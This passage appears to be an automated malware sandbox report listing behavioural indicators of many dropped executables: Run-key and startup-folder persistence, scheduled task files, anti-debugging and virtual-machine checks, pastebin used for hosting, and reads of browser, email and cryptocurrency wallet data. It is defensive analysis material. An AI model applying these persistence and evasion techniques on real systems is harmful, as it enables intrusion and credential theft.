| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0389b600fa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\0389b600fa.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\8SgVdVfj\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4164 set thread context of 4612 | N/A | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe |
| PID 5700 set thread context of 5740 | N/A | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\0389b600fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
